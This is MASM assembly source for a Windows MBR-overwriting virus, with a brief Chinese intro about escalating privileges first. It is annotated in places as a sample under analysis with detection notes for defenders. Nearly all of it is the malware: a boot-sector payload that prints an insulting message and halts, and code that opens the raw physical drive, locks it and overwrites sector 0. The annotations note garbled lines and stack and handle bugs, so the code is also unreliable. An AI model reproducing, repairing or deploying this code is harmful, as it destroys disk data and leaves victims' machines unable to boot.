来自于很老的代码了。
先提权，然后……
; MASM (Intel syntax), 32-bit flat model, stdcall default for procs.
; Sample under analysis: a user-mode MBR overwriter. It needs an
; administrative token to open \\.\PHYSICALDRIVE0 for writing, which is
; what the "escalate first" note at the top of the page refers to.
.586
.model flat, stdcall
locals @@                               ; enable @@label local-label scoping
include useful.inc                      ; not on this page; presumably supplies the callw macro and Win32 prototypes
extern DeviceIoControl:Proc             ; the only API declared here; CreateFileA/WriteFile/CloseHandle come via the include - TODO confirm
.data
; Boot-sector payload that gets copied into the 512-byte write buffer.
; The first 24 bytes decode as 16-bit real-mode code (hedged: manual
; decode of the opcodes below): int 10h set video mode, then int 10h
; AH=13h "write string" pointing ES:BP at 7C18h (= 7C00h + 18h, i.e. the
; text that follows, CX=18h = 24 characters), then a `loop $` that spins
; forever. Net effect on an infected machine: the BIOS prints the text
; and the boot never proceeds.
dbVirusCode:
db 0b8h, 012h, 000h, 0cdh, 010h, 0bdh, 018h, 07ch        ; mov ax,12h / int 10h / mov bp,7C18h
db 0b9h, 018h, 000h, 0b8h, 001h, 013h, 0bbh, 00ch        ; mov cx,18h / mov ax,1301h / mov bx,0Ch
db 000h, 0bah, 01dh, 00eh, 0cdh, 010h, 0e2h, 0feh        ; mov dx,0E1Dh / int 10h / loop $
db 'I am virus! Fuck you :-)', 0                          ; 24-char message + NUL; useful as a static detection string
dwVirusCodeSize = $ - dbVirusCode                         ; assemble-time size of the payload (49 bytes)
szPhysicalDrive0 db '\\.\PHYSICALDRIVE0', 0               ; raw-disk device name; opening this with GENERIC_WRITE is the key behavioral indicator
.code
public c entry                          ; exported with C naming (plain `_entry`), matches the `end` directive's entry point
;-----------------------------------------------------------------------
; entry
; Purpose (as visible here): build a 512-byte sector image from
; dbVirusCode, open \\.\PHYSICALDRIVE0, lock the volume, write the image
; at the current file pointer (0 after CreateFile, i.e. the MBR), unlock,
; close. No return value is set deliberately; eax holds whatever the last
; pop left.
; ABI:   stdcall frame (MASM emits push ebp/mov ebp,esp for the LOCAL).
; Regs:  ebx = 0 (NULL/FALSE for every zero argument)
;        edi = buffer pointer, later expected to be the device handle
;        esi = payload pointer, later DeviceIoControl address
; Detection notes for defenders: CreateFile on a PhysicalDriveN name with
; write access, FSCTL_LOCK_VOLUME, a 512-byte WriteFile and
; FSCTL_UNLOCK_VOLUME in sequence is the raw MBR-overwrite pattern;
; running as a standard user makes the CreateFileA below fail.
;-----------------------------------------------------------------------
entry proc
LOCAL @szBuffer: BYTE                   ; declared as ONE byte, yet 1024 bytes are stored through it below;
                                        ; on a MASM frame that runs up into saved ebp/return address - TODO confirm frame layout
xor ebx, ebx                            ; ebx = 0, reused as NULL for all the zero arguments
lea edi, [@szBuffer]
push edi                                ; save buffer pointer twice: stosb and movsb both advance edi
push edi
xor al, al
mov ecx, 1024
rep stosb                               ; zero 1024 bytes from the buffer (see the LOCAL size caveat above)
mov esi, offset dbVirusCode
pop edi                                 ; edi = buffer again
push dwVirusCodeSize                    ; assemble-time constant, pushed as an immediate
pop ecx
rep movsb                               ; copy the payload into the start of the buffer
pop edi                                 ; edi = buffer again
; NOTE(review): the next two lines are garbled in this copy - the
; destination operands are missing, so they do not assemble as shown.
; 055h/0AAh are the values of the boot-sector signature; this is where
; the sample would mark the buffer as a valid MBR.
mov by , 055h
mov by , 0AAh
; CreateFileA(szPhysicalDrive0, GENERIC_READ|GENERIC_WRITE,
;             FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)
push ebx                                ; hTemplateFile = NULL
push ebx                                ; dwFlagsAndAttributes = 0
push 3 ; OPEN_EXISTING
push ebx                                ; lpSecurityAttributes = NULL
push 3 ; FILE_SHARE_READ or FILE_SHARE_WRITE
push 0c0000000h ; GENERIC_READ or GENERIC_WRITE
push offset szPhysicalDrive0
callw CreateFileA                       ; callw is not defined on this page (presumably useful.inc)
cmp eax, -1                             ; INVALID_HANDLE_VALUE -> bail out (this is the path a non-admin user hits)
je @@ExitProc
; NOTE(review): the handle is in eax but is never visibly moved into edi,
; yet edi is pushed as hDevice/hFile below. Unless callw does that move,
; the later calls receive the buffer pointer instead of the handle.
mov esi, offset DeviceIoControl
; One scratch dword is pushed here and its address passed as the
; lpBytesReturned/lpNumberOfBytesWritten out-parameter of all three calls
; (stdcall callees clean their own arguments, so esp lands back on this
; slot after each call). It is popped once at the end, so the stack stays balanced.
push ebx
mov eax, esp                            ; eax = &scratch
; DeviceIoControl(h, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &scratch, NULL)
push ebx                                ; lpOverlapped
push eax                                ; lpBytesReturned
push ebx                                ; nOutBufferSize
push ebx                                ; lpOutBuffer
push ebx                                ; nInBufferSize
push ebx                                ; lpInBuffer
push 00090018h ; FSCTL_LOCK_VOLUME
push edi                                ; hDevice (see the edi/eax note above)
call esi
mov eax, esp                            ; eax = &scratch again
; WriteFile(h, @szBuffer, 512, &scratch, NULL) - file pointer is still 0,
; so this is sector 0 of the physical disk. Return values are never checked.
push ebx                                ; lpOverlapped
push eax                                ; lpNumberOfBytesWritten
push 512                                ; one sector
lea eax, [@szBuffer]
push eax                                ; lpBuffer
push edi                                ; hFile
callw WriteFile
mov eax, esp                            ; eax = &scratch again
; DeviceIoControl(h, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &scratch, NULL)
push ebx
push eax
push ebx
push ebx
push ebx
push ebx
push 0009001ch ; FSCTL_UNLOCK_VOLUME
push edi
call esi
push edi
callw CloseHandle
pop eax                                 ; discard the scratch dword (eax = last bytes-returned value)
@@ExitProc:
ret                                     ; MASM's LOCAL epilogue restores esp/ebp before this
entry endp
end |